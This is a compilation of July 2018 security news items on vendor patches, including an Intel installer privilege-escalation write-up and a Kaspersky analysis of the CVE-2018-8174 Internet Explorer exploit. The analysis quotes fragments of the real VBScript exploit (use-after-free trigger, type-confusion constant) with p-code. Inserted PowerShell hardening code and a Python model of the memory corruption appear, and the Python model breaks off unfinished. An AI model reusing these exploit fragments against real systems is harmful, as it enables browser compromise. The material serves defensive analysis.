Three of the flaws patched this month were publicly disclosed before Microsoft released patches. The list includes CVE-2018-8278, a spoofing vulnerability affecting Edge; and CVE-2018-8314 and CVE-2018-8313, both of which are Windows privilege escalation vulnerabilities.

Trend Micro’s Zero Day Initiative (ZDI) has highlighted some of the more interesting flaws patched this month. One of them is a low severity Office tampering issue that can be exploited by getting the targeted user to open a specially crafted file.

“An attacker exploiting this vulnerability could embed untrusted TrueType fonts into an email. Bugs in fonts have been popular since 2013 and have been used in malware attacks in the past. This bug could allow them to spread and possibly even bypass traditional filters. That’s likely the reason Microsoft chose to go ahead and release a patch for this Low-rated vulnerability,” ZDI explained in a blog post.

Another interesting vulnerability that is not very serious affects the Microsoft Wireless Display Adapter (MWDA). The flaw allows an authenticated attacker to execute arbitrary commands, but what makes the issue interesting is the fact that a firmware update is required to address it.

“To get the new firmware, it has to be downloaded from the Wireless Display Adapter App available in the Microsoft App Store. That doesn’t sound like something easily automated. From a sysadmin’s perspective, this patch will be very labor intensive to roll out,” ZDI said.

Microsoft also made some updates to advisories describing the Spectre and Meltdown vulnerabilities, including to inform users of a new Spectre variant.

Adobe’s Patch Tuesday updates resolve more than 100 vulnerabilities in Acrobat and Reader, including tens of critical memory corruption bugs that can allow remote code execution. The company has also released security updates for Flash Player, Experience Manager, and Connect.


CredSSP Flaw Exposes Pepperl+Fuchs HMI Devices to Attacks
18.7.2018 securityweek  Attack 
Vulnerebility

A vulnerability in the Credential Security Support Provider (CredSSP) authentication protocol has been found to impact several human-machine interface (HMI) products from Germany-based industrial automation firm Pepperl+Fuchs.

The flaw, tracked as CVE-2018-0886, affects all supported versions of Windows and it was fixed by Microsoft with its March 2018 Patch Tuesday updates.

The vulnerability was discovered by security firm Preempt, which has classified it as critical, but Microsoft, which believes exploitation is “less likely,” has assigned it only an “important” severity rating.

CredSSP processes authentication requests for applications such as the Remote Desktop Protocol (RDP) and Windows Remote Management (WinRM). A man-in-the-middle (MitM) attacker can exploit this vulnerability to remotely execute arbitrary code and move laterally within the targeted organization’s network.

Microsoft says any application using CredSSP for authentication could be vulnerable to this type of attack.

According to an advisory published by Germany’s CERT@VDE, an organization that focuses on industrial cybersecurity, CVE-2018-0886 affects Pepperl+Fuchs’ VisuNet RM, VisuNet PC, and Box Thin Client BTC human-machine interface products.

“A successful vulnerability exploitation enables an attacker to execute arbitrary code and get access to sensitive data, e.g. passwords of the compromised system. The vulnerability allows the attacker to intercept the initial RDP connection between a client and a remote-server. Then an attacker can relay user credentials to a target system and thus get complete Man in the Middle control over a session. A stolen session can be abused to run arbitrary code or commands on the target server on behalf of the user,” CERT@VDE said in its advisory.

Pepperl+Fuchs has advised owners of devices running RM Shell 4 and RM Shell 5 HMI software to install the security patches provided by the company. Users of devices running Windows 7 or Windows 10 can patch the vulnerability by updating Windows.

The advisory from CERT@VDE says Preempt reported the vulnerabilities to Pepperl+Fuchs, but the security firm told SecurityWeek that it did not explicitly reach out to any ICS vendor.

“CredSSP is a broadly used protocol and we worked with Microsoft, since it was in their software that we found these vulnerabilities,” said Ajit Sancheti, co-founder and CEO at Preempt. “It is quite likely that Pepperl+Fuchs uses the MSFT version and hence may have been informed by them.”

Products from other ICS vendors are likely also affected by the CredSSP vulnerability, but to date no other company has published security advisories.


Hackers Can Chain Multiple Flaws to Attack WAGO HMI Devices
18.7.2018 securityweek 
Vulnerebility

Germany-based industrial automation company WAGO has patched several vulnerabilities in its e!DISPLAY 7300T Web Panel human-machine interface (HMI) products that can be chained to take control of affected devices.

The security holes, discovered by researchers at security consultancy SEC Consult and rated “high severity,” include multiple reflected and one stored cross-site scripting (XSS) vulnerabilities (CVE-2018-12981), unrestricted file upload and file path manipulation issues (CVE-2018-12980), and an incorrect default permissions flaw (CVE-2018-12979).

The reflected XSS flaws allow an unauthenticated attacker to execute arbitrary scripts in the context of the victim and hijack their session by getting them to click on a specially crafted link. The stored XSS can only be exploited by an authenticated attacker, but it does not require the targeted user to click on a link. Instead, the malicious code is triggered when the victim visits the “PLC List” page in the web interface.

The unrestricted file upload vulnerability allows an attacker to upload arbitrary files, but not directly into the web root, as the web service does not run as a privileged user. On the other hand, the incorrect default permissions weakness does allow a file in the web root, specifically index.html, to be overwritten by the unprivileged “www” user.

Combining these flaws allows an attacker to upload a shell by overwriting index.html and execute arbitrary commands with the privileges of the “www” user.

“HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users which access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code in order to break the security of this link by exploiting minimal user interaction,” SEC Consult explained. “As a consequence a computer which is used for HMI administration should not provide any possibility to get compromised via malicious script code.”

The vulnerabilities impact e!DISPLAY 7300T Web Panel models 762-3000, 762-3001, 762-3002 and 762-3003 running firmware version 01. The issues have been patched by the vendor with the release of firmware version 02.

In addition to installing the latest firmware, WAGO has advised customers to restrict network access to the device and avoid connecting it directly to the Internet, restrict the number of users who can access the system, change default passwords, and avoid clicking on links from untrusted sources.

Advisories describing these vulnerabilities have been published by SEC Consult, CERT@VDE, which coordinated the disclosure of the flaws, and WAGO.

This was not the first time SEC Consult identified vulnerabilities in WAGO products. Last year, the company reported finding a potentially serious vulnerability that could give a remote attacker access to an organization’s entire network.


Intel Patches Security Flaws in Processor Diagnostic Tool
12.7.2018 securityweek 
Vulnerebility

Intel has updated its Processor Diagnostic Tool to address vulnerabilities that could lead to arbitrary code execution and escalation of privileges.

The Intel Processor Diagnostic Tool (IPDT) is a piece of software designed to verify the functionality of an Intel processor. It can check for brand identification and operating frequency, test specific features, and perform a stress test on the processor.

The recently addressed vulnerabilities (two of which are tracked as CVE-2018-3667 and CVE-2018-3668) were found by Stephan Kanthak and affect the IPDT releases up to v4.1.0.24, Intel reveals.

Kanthak says he found a total of four vulnerabilities in the executable installers of Intel’s tool, three of which would lead to arbitrary code execution with escalation of privilege, and a fourth that could lead to denial of service.

The security flaws can be exploited in standard Windows installations where the UAC-protected administrator account created during Windows setup is used without elevation.

“This precondition holds for the majority of Windows installations: according to Microsoft's own security intelligence reports <https://www.microsoft.com/security/sir>, about 1/2 to 3/4 of the about 600 million Windows installations which send telemetry data have only ONE active user account,” Kanthak points out.

The issue is that the IPDT installer creates three files with improper permissions, thus opening the door to said vulnerabilities.

One issue was that the installer created a randomly named folder in the %TEMP% directory, copied itself into it, and then executed the copy. Because the folder and the copy inherit the NTFS access control list from %TEMP%, once execution of files from that directory is denied, the installer would fail to execute.

Another issue was that the copy of the executable self-extractor would run with administrative privileges, but the extracted payloads (the installers setup.exe and setup64.exe, and the batch script setup.bat) are dropped unprotected into the user's %TEMP% directory. The copy would also change directory to %TEMP% and execute the batch script %TEMP%\setup.bat.

“The extracted files inherit the NTFS ACLs from their parent %TEMP%, allowing ‘full access’ for the unprivileged (owning) user, who can replace/overwrite the files between their creation and execution. Since the files are executed with administrative privileges, this vulnerability results in arbitrary code execution with escalation of privilege,” the researcher notes.

Because setup.bat calls setup.exe and setup64.exe without a path, the command processor looks for them first in the current working directory and then in the directories listed in %PATH%.

In Windows Vista and newer, however, the current working directory can be removed from the executable search path. An unprivileged user, who is in full control of %PATH%, can therefore make the two names resolve to rogue files in an arbitrary directory they add to %PATH%, which results in arbitrary code execution with escalation of privilege.

The researcher also discovered that the two setup executables load multiple Windows system DLLs from their "application directory" in the %TEMP% folder, instead of from Windows' "system directory."

“An unprivileged attacker running in the same user account can copy rogue DLLs into %TEMP%; these are loaded and their DllMain() routine executed with administrative privileges, once more resulting in arbitrary code execution with escalation of privilege,” the researcher points out.
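All three code-execution issues share one root cause: files that an elevated process will load or execute are dropped where an unelevated process of the same user can replace them. The PowerShell below is an added illustration of how to audit a set of dropped files for that pattern and how an installer wrapper can avoid it; it is not Intel's installer code or the researcher's proof of concept. The payload names come from the description above; the %SystemRoot%\Temp location, the "ipdt-" prefix, the archive name in the usage comment and the function names are assumptions.

```powershell
# Added example; not Intel's code. Paths, prefix and function names are assumptions.

# 1. Audit: find Allow ACEs that let anything other than SYSTEM, Administrators or
#    TrustedInstaller modify a dropped file. Under UAC an unelevated process of the
#    same user carries Administrators only as a deny-only group, so an ACE for the
#    user SID, Users or Authenticated Users is enough to swap the file before it runs.
function Get-UnprivilegedWriteAccess {
    param([Parameter(Mandatory)][string[]]$Path)
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
    foreach ($p in $Path) {
        $acl = Get-Acl -LiteralPath $p
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($trusted -contains $ace.IdentityReference.Value) { continue }
            $rights = $ace.FileSystemRights.ToString()
            # Generic rights (GENERIC_ALL etc.) render as a bare number; treat them as write-capable.
            if ($rights -match 'Write|Modify|FullControl' -or $rights -match '^-?\d+$') {
                [pscustomobject]@{
                    Path      = $p
                    Principal = $ace.IdentityReference.Value
                    Rights    = $rights
                    Owner     = $acl.Owner   # the owner can rewrite the DACL whatever the ACEs say
                }
            }
        }
    }
}

# 2. Hardening: a fresh extraction directory whose DACL and owner belong only to
#    SYSTEM and Administrators. Inheritance from the parent is cut, so nothing the
#    unelevated user controls in %TEMP% or %SystemRoot%\Temp propagates into it.
function New-ProtectedExtractDir {
    $dir = Join-Path $env:SystemRoot ('Temp\ipdt-' + [guid]::NewGuid().ToString('N'))  # assumed location
    $null = New-Item -ItemType Directory -Path $dir
    $acl = Get-Acl -LiteralPath $dir
    $acl.SetAccessRuleProtection($true, $false)          # protected DACL, inherited ACEs discarded
    foreach ($id in 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators') {
        $acl.AddAccessRule([System.Security.AccessControl.FileSystemAccessRule]::new(
            $id, 'FullControl', 'ContainerInherit,ObjectInherit', 'None', 'Allow'))
    }
    $acl.SetOwner([System.Security.Principal.NTAccount]'BUILTIN\Administrators')
    Set-Acl -LiteralPath $dir -AclObject $acl
    return $dir
}

# 3. Launch: absolute path, and a %PATH% reduced to the system directories so that a
#    batch file which still calls "setup.exe" by bare name cannot be redirected to a
#    directory the user added to the search path.
function Invoke-ProtectedSetup {
    param([Parameter(Mandatory)][string]$Dir, [string]$Exe = 'setup.exe')
    $full = Join-Path $Dir $Exe
    if (-not (Test-Path -LiteralPath $full)) { throw "payload not found: $full" }
    $env:PATH = "$env:SystemRoot\System32;$env:SystemRoot"
    Start-Process -FilePath $full -WorkingDirectory $Dir -Wait -PassThru
}

# Usage (elevated session):
#   Get-UnprivilegedWriteAccess -Path "$env:TEMP\setup.exe", "$env:TEMP\setup64.exe", "$env:TEMP\setup.bat"
#   $dir = New-ProtectedExtractDir
#   Expand-Archive -LiteralPath .\IPDT.zip -DestinationPath $dir   # archive name assumed
#   Invoke-ProtectedSetup -Dir $dir
```

Run it from an elevated session. The audit reports every Allow ACE that grants Write, Modify or FullControl (or raw generic rights, which show as a number) to a principal other than SYSTEM, Administrators or TrustedInstaller, together with the owner, because the owner can always rewrite the DACL regardless of the ACEs. The protected directory closes the file-swap and rogue-DLL cases: the unelevated token holds Administrators as a deny-only group and cannot write there. Resetting %PATH% and launching by absolute path closes the %PATH% redirection for a batch file that still names its children without a path. Loading system DLLs from the application directory is a defect in the binaries themselves (addressed by a manifest or by calling SetDefaultDllDirectories), so the directory protection only removes the attacker's ability to plant the DLLs.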

The issues were reported to Intel in May and the company updated the installer the same month, but information on the vulnerabilities was not released until last week. Intel Processor Diagnostic Tool v4.1.0.27 resolves all of the above issues.


Critical flaws patched in ISP Advanced Digital Broadcast Broadband devices

11.7.2018 securityaffairs Vulnerebility

Advanced Digital Broadcast has rolled out security patches to fix three critical vulnerabilities in its broadband gear.
Advanced Digital Broadcast has released patches for three critical vulnerabilities affecting its broadband gateways. All ADB broadband gateways and routers based on the Epicentro platform are affected by the vulnerabilities.

The flaws, discovered nearly two years ago, are a privilege escalation bug, an authorization bypass issue, and a local jailbreak bug.

Advanced Digital Broadcast manufactures routers and network devices for dozens of broadband and telco firms.

The vulnerabilities were first discovered in June 2016 by experts at SEC Consult Vulnerability Lab.

The company started rolling out the patches in July 2017.

Let’s see in detail the three flaws:

CVE-2018-13108 is a local root jailbreak flaw that can be exploited by leveraging the devices’ network file sharing feature.
“By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges,” according to researchers. “Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys.”

Experts explained that the “network file sharing” feature of ADB broadband devices uses a Samba daemon to expose USB storage attached to the device. The daemon runs in the background with the highest privileges and exports the network shares with root user permissions, which an attacker with access to the USB port can abuse.

CVE-2018-13109 is an authorization bypass vulnerability that affects some versions of the firmware used in ADB broadband devices. It could be exploited by an attacker to gain access to device settings in the web interface that are otherwise forbidden to the user.
“By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP.” researchers wrote. “It is also possible to manipulate settings to e.g. enable the telnet server for remote access if it had been previously disabled by the ISP.”

CVE-2018-13110 is a privilege escalation vulnerability via Linux group manipulation that could be exploited by an attacker to gain access to the command line interface (CLI) of the device, even if the CLI was previously disabled by the ISP.
“By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) if previously disabled by the ISP.” researchers wrote.

“Depending on the feature-set of the CLI (ISP dependent) it is then possible to gain access to the whole configuration and manipulate settings in the web GUI and escalate privileges to highest access rights.”

ADB has released an updated firmware that addresses the flaws.


Adobe July Patch Tuesday fixes over 100 flaws in Adobe Acrobat and Reader
11.7.2018 securityaffairs
Vulnerebility

Adobe released July Patch Tuesday security updates that address over 100 flaws in Acrobat and Reader, and other issues in Flash Player, Experience Manager, and Connect.
Adobe on Tuesday released July Patch Tuesday security updates that address more than 100 flaws in its products: 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.

Windows and macOS versions of Adobe Acrobat and Reader were affected by tens of critical memory corruption bugs that could be exploited by an attacker for remote code execution. The list of flaws includes double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error vulnerabilities.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

The July Patch Tuesday security updates also addressed a critical privilege escalation and tens of important out-of-bounds read vulnerabilities.

Many flaws fixed by Adobe were reported to the company through the Trend Micro’s Zero-Day Initiative (ZDI).

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 30.0.0.113 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by Adobe for Flash Player.

Adobe also addressed three server-side request forgery (SSRF) vulnerabilities in Experience Manager that can lead to the exposure of sensitive information, and fixed authentication bypass and insecure library loading flaws in Adobe Connect. None of the flaws in Experience Manager and Adobe Connect was rated critical.

The good news for the Adobe customers is that the company is not aware of any attack in the wild that exploited one of the flaws addressed with the July Patch Tuesday security updates.


Thunderbird Version 52.9 addresses several issues, including the EFAIL flaw
6.7.2018 securityaffairs
Vulnerebility

The Thunderbird team released a new version of the popular email client that addresses many security issues, including the EFAIL vulnerability.
Thunderbird has released a new version to address a dozen security vulnerabilities, including the EFAIL encryption issue that was discovered in May.

The new version addresses two EFAIL-related issues in the way Thunderbird handles encrypted messages.

“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers that discovered the EFAIL flaw.

“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”

The new Thunderbird 52.9 addresses CVE-2018-12372, a flaw that lets attackers build S/MIME and PGP decryption oracles with crafted HTML messages.

“Decrypted S/MIME parts, when included in HTML crafted for an attack, can leak plaintext when included in a HTML reply/forward.” reads the security advisory published by the Mozilla Foundation.

The new version also fixes the CVE-2018-12373 flaw that could result in the leakage of S/MIME plaintext when a message is forwarded.

Thunderbird 52.9 also addresses some critical flaws, such as CVE-2018-12359, a buffer overflow vulnerability that results in a potentially exploitable crash.

“A buffer overflow can occur when rendering canvas content while adjusting the height and width of the <canvas> element dynamically, causing data to be written outside of the currently computed boundaries.”

The new release also fixes a use-after-free flaw tracked as CVE-2018-12360 that could be exploited to crash a target system.

“A use-after-free vulnerability can occur when deleting an <input> element during a mutation event handler triggered by focusing that element. This results in a potentially exploitable crash.” continues the advisory.

Another security issue, tracked as CVE-2018-12368, concerns SettingContent-ms files: security researcher Matt Nelson discovered that Windows 10 users were not being warned when opening such files, which could let attackers execute arbitrary code by tricking users into opening them.

“Windows 10 does not warn users before opening executable files with the SettingContent-ms extension even when they have been downloaded from the internet and have the “Mark of the Web.” continues the advisory.

“Without the warning, unsuspecting users unfamiliar with this new file type might run an unwanted executable. This also allows a WebExtension with the limited downloads.open permission to execute arbitrary code without user interaction on Windows 10 systems”.

Thunderbird also addressed some memory safety bugs inherited from the Firefox code base.

The good news is that these bugs cannot be directly exploited in the email client, because scripting is disabled while users are reading messages.


Google Fixes Critical Android Vulnerabilities
5.7.2018 securityweek 
Vulnerebility

Google this week released its July 2018 set of Android patches to address tens of vulnerabilities in the mobile operating system, including several rated as Critical.

The Internet giant addressed 11 vulnerabilities as part of the 2018-07-01 security patch level, three of them rated Critical and eight rated High. The issues impact the framework, media framework, and system components.

All three Critical severity bugs are remote code execution flaws, one for each of the impacted components. The remaining vulnerabilities include information disclosure bugs, elevation of privilege issues, and denial of service flaws.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes in an advisory.

Affected operating system versions include Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.

A total of 32 flaws were addressed as part of the 2018-07-05 security patch level, 8 rated Critical severity and 24 considered High risk.

These issues impact Kernel, Qualcomm, and Qualcomm closed-source components such as IPV6 stack, futex, USB driver, WLAN, nsfs, OpenGL ES driver, and ADSPRPC heap manager.

Of the resolved vulnerabilities, 22 were impacting Qualcomm closed-source components. These include 7 Critical issues and 15 High risk flaws.

Six vulnerabilities were addressed in Qualcomm components, including a Critical remote code execution flaw, one High severity remote code execution bug, two High risk information disclosure issues, and two elevation of privilege vulnerabilities.

All four flaws addressed in Kernel components were elevation of privilege bugs.

This month, Google also addressed 26 Medium severity issues impacting Pixel and Nexus devices. Affected components include framework, media framework, system, Kernel components, and Qualcomm components.

Most of the addressed issues were elevation of privilege bugs, but remote code execution and information disclosure security vulnerabilities were also addressed.

Additionally, the Internet giant released a functional update for the Pixel and Nexus devices, to “improve consistency of Wi-Fi connections with certain routers,” the advisory reads.

Last month, Google addressed a dozen Critical flaws in Android, along with tens of High risk issues. The company also resolved over 60 vulnerabilities affecting Pixel and Nexus devices, most of which were rated Medium severity.


Delving deep into VBScript

5.7.2018 Kaspersky Vulnerebility
Analysis of CVE-2018-8174 exploitation
In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.

But whereas CVE-2014-6332 was aimed at integer overflow exploitation for writing to arbitrary memory locations, my interest lay in how this technique was adapted to exploit the use-after-free vulnerability. To answer this question, let’s consider the internal structure of the VBScript interpreter.

Undocumented platform
Debugging a VBScript executable is a tedious task. Before the script is executed, it is compiled into p-code, which is then interpreted by the virtual machine. There is no open source information about the internal structure of this virtual machine and its instructions. It took me a lot of effort to track down a couple of web pages with Microsoft engineer reports dated 1999 and 2004 that shed some light on the p-code. There was enough information there for me to fully reverse-engineer all the VM instructions and write a disassembler! The final scripts for disassembling VBScript p-code in memory from within the IDA Pro and WinDbg debuggers are available in our Github repository.

With an understanding of the interpreted code, we can precisely monitor the execution of the script: we have full information about where the code is being executed at any given moment, and we can observe all objects that are created and referenced by the script. All this greatly assists in the analysis.

The best place to run the disassembling script is the CScriptRuntime::RunNoEH function, which directly interprets the p-code.

Important fields in the CScriptRuntime class

The CScriptRuntime class contains all information about the state of the interpreter: local variables, function arguments, pointers to the top of the stack and the current instruction, plus the address of the compiled script.

The VBScript virtual machine is stack-oriented and consists of slightly more than 100 instructions.

All variables (local arguments and ones on the stack) are represented as a VARIANT structure occupying 16 bytes, where the upper word indicates the data type. Some of the type values are given on the relevant MSDN page.

CVE-2018-8174 exploitation
Below is the code and disassembled p-code of class ‘Class1’:

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class

Function 34 (‘Class1’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass
0005 OP_FnBindEx ‘p’ 35 FALSE
000F OP_FnBindEx ‘SetProp’ 36 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 35 (‘p’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8252,8264)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
Function 36 (‘SetProp’) [max stack = 1]:
arg count = 1
arg -1 = ref Variant ‘value’
lcl count = 0
Pcode:
***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr -1
0005 OP_NamedSt ‘mem’
***BOS(8304,8315)*** SetProp=(0) *****
000A OP_Bos1 1
000C OP_IntConst 0
000E OP_LocalSt 0
***BOS(8317,8329)*** End Function *****
0011 OP_Bos1 2
0013 OP_FnReturn
0014 OP_Bos0
0015 OP_FuncEnd

Function 34 is a constructor of class ‘Class1’.

The OP_CreateClass instruction calls the VBScriptClass::Create function to create a VBScriptClass object.

The OP_FnBindEx and OP_CreateVar instructions try to fetch the variables passed in the arguments, and since they do not yet exist, they are created by the VBScriptClass::CreateVar function.

This diagram shows how variables can be fetched from a VBScriptClass object. The value of the variable is stored in the VVAL structure:

To understand the exploitation, it is important to know how variables are represented in the VBScriptClass structure.

When the OP_NamedSt ‘mem’ instruction is executed in function 36 (‘SetProp’), it calls the Default Property Getter of the instance of the class that was previously stacked and then stores the returned value in the variable ‘mem’.

***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr -1 <-------- put argument on stack
0005 OP_NamedSt ‘mem’ <-------- if it's a class dispatcher with Default Property Getter, call and store returned value in mem

Below is the code and disassembled p-code of function 30 (p), which is called during execution of the OP_NamedSt instruction:

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl(“174088534690791e-324”)
For IIIl=0 To 6
IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
Set IIIlI(IIIl)=llII
Next
End Property
End Class

Function 30 (‘p’) [max stack = 3]:
arg count = 0
lcl count = 1
lcl 1 = Variant ‘llII’
tmp count = 4
Pcode:
***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0
***BOS(8763,8782)*** For IIIl=(0) To (6) *****
0011 OP_Bos1 1
0013 OP_IntConst 0
0015 OP_IntConst 6
0017 OP_IntConst 1
0019 OP_ForInitNamed ‘IIIl’ 5 4
0022 OP_JccFalse 0047
***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
0027 OP_Bos1 2
0029 OP_IntConst 0
002B OP_NamedAdr ‘IIIl’
0030 OP_CallNmdSt ‘IIIlI’ 1
***BOS(8826,8830)*** Next *****
0037 OP_Bos1 3
0039 OP_ForNextNamed ‘IIIl’ 5 4
0042 OP_JccTrue 0027
***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1
***BOS(8876,8891)*** llII.mem=lIlIIl *****
0051 OP_Bos1 5
0053 OP_NamedAdr ‘lIlIIl’
0058 OP_LocalAdr 1
005B OP_MemSt ‘mem’
….

The first basic block of this function is:

***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0

This block converts the string ‘174088534690791e-324’ to VARIANT and stores it in the local variable 0, reserved for the return value of the function.

VARIANT obtained after converting ‘174088534690791e-324’ to double

After the return value is set but before it is returned, this function performs:

For IIIl=0 To 6
IIIlI(IIIl)=0
Next

This calls the garbage collector for the ‘Class1’ instance and results in a dangling pointer reference due to the use-after-free vulnerability in Class_Terminate() that we discussed earlier.

In the line

***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1

the OP_InitClass ‘Class2’ instruction creates an “evil twin” instance of class ‘Class1’ at the location of the previously freed VBScriptClass, which is still referenced by the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’).

Class ‘Class2’ is the “evil twin” of class ‘Class1’:

Class Class2
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class

Function 31 (‘Class2’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass ‘Class2’
0005 OP_FnBindEx ‘P0123456789’ 32 FALSE
000F OP_FnBindEx ‘SPP’ 33 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 32 (‘P0123456789’) [max stack = 2]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
0000 OP_Bos1 0
0002 OP_NamedAdr ‘IlII’
0007 OP_IntConst 8
0009 OP_Add
000A OP_CallNmdAdr ‘mem’ 1
0011 OP_CallNmdAdr ‘LenB’ 1
0018 OP_LocalSt 0
***BOS(8423,8435)*** End Function *****
001B OP_Bos1 1
001D OP_FnReturn
001E OP_Bos0
001F OP_FuncEnd
Function 33 (‘SPP’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8451,8463)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd

The location of variables in memory is predictable. The amount of data occupied by the VVAL structure is calculated using the formula 0x32 + the length of the variable name in UTF-16.

Below is a diagram that shows the location of ‘Class1’ variables relative to ‘Class2’ variables when ‘Class2’ is allocated in place of ‘Class1’.

When execution of the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’) is complete, the value returned by function 30 (‘p’) is written to memory through the dangling pointer of VVAL ‘mem’ in Class1, overwriting the VARIANT type of VVAL ‘mem’ in Class2.

VARIANT of type Double overwrites the VARIANT type from String to Array

Thus, an object of type String is converted to an object of type Array, and data that was previously considered to be a string is treated as an Array control structure, allowing access to be gained to the entire address space of the process.
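The following Python is added here as an illustration and is not part of Kaspersky's analysis or of the exploit. It models two facts from this section: the VVAL size formula, and the fact that the double produced by CDbl("174088534690791e-324") carries the VARIANT type word 0x200C (VT_ARRAY|VT_VARIANT) at byte offset 4 of its image, which is what turns the String VARIANT into an Array VARIANT once it is written over the type field. The overlap alignment in overwrite_type_with_double, the sample script and the pointer value are constructed assumptions, and the CDbl scan at the end is a defender-side heuristic rather than anything from the article.

```python
import re
import struct

# Win32 VARENUM type tags (documented values, not page-specific)
VT_R8 = 0x0005                   # 8-byte double, what CDbl() produces
VT_BSTR = 0x0008                 # string
VT_VARIANT = 0x000C
VT_ARRAY = 0x2000
VT_ARRAY_OF_VARIANT = VT_ARRAY | VT_VARIANT   # 0x200C: SAFEARRAY of VARIANT


def vval_alloc_size(name: str) -> int:
    """Size of a VVAL per the article: 0x32 bytes plus the UTF-16 length of the name."""
    return 0x32 + len(name.encode("utf-16-le"))


def double_bits(value: float) -> int:
    """Raw IEEE-754 bit pattern of a double, as the interpreter stores it in a VARIANT."""
    return struct.unpack("<Q", struct.pack("<d", value))[0]


def type_word_offsets(value: float, vt: int = VT_ARRAY_OF_VARIANT) -> list:
    """Byte offsets inside the 8-byte little-endian image of `value` where word `vt` appears."""
    raw = struct.pack("<d", value)
    return [i for i in range(7) if struct.unpack_from("<H", raw, i)[0] == vt]


def variant_image(vt: int, data: bytes) -> bytes:
    """16-byte VARIANT image: vt, three reserved words, then 8 data bytes."""
    if len(data) != 8:
        raise ValueError("VARIANT data must be 8 bytes")
    return struct.pack("<HHHH", vt, 0, 0, 0) + data


def overwrite_type_with_double(victim: bytes, value: float) -> bytes:
    """Model of the dangling-pointer write: the Double's bytes, from the one that
    starts the type word onward, land on top of the victim VARIANT's vt field.
    The real overlap is given by the article's memory diagram; here it is an
    assumption chosen so that the 0x200C word lines up with vt."""
    raw = struct.pack("<d", value)
    offs = type_word_offsets(value)
    if not offs:
        raise ValueError("double does not carry an array type word")
    tail = raw[offs[0]:]
    return tail + victim[len(tail):]


def string_to_array_type_confusion(value: float) -> tuple:
    """Return (vt_before, vt_after, data_pointer) for a constructed VT_BSTR VARIANT
    after the overwrite. The pointer at +8 is untouched, so what used to be the
    BSTR pointer is now read as a SAFEARRAY* (the 'Array control structure')."""
    bstr_ptr = 0x0BADF00D                       # constructed, not a real address
    victim = variant_image(VT_BSTR, struct.pack("<II", bstr_ptr, 0))
    after = overwrite_type_with_double(victim, value)
    vt_after = struct.unpack_from("<H", after, 0)[0]
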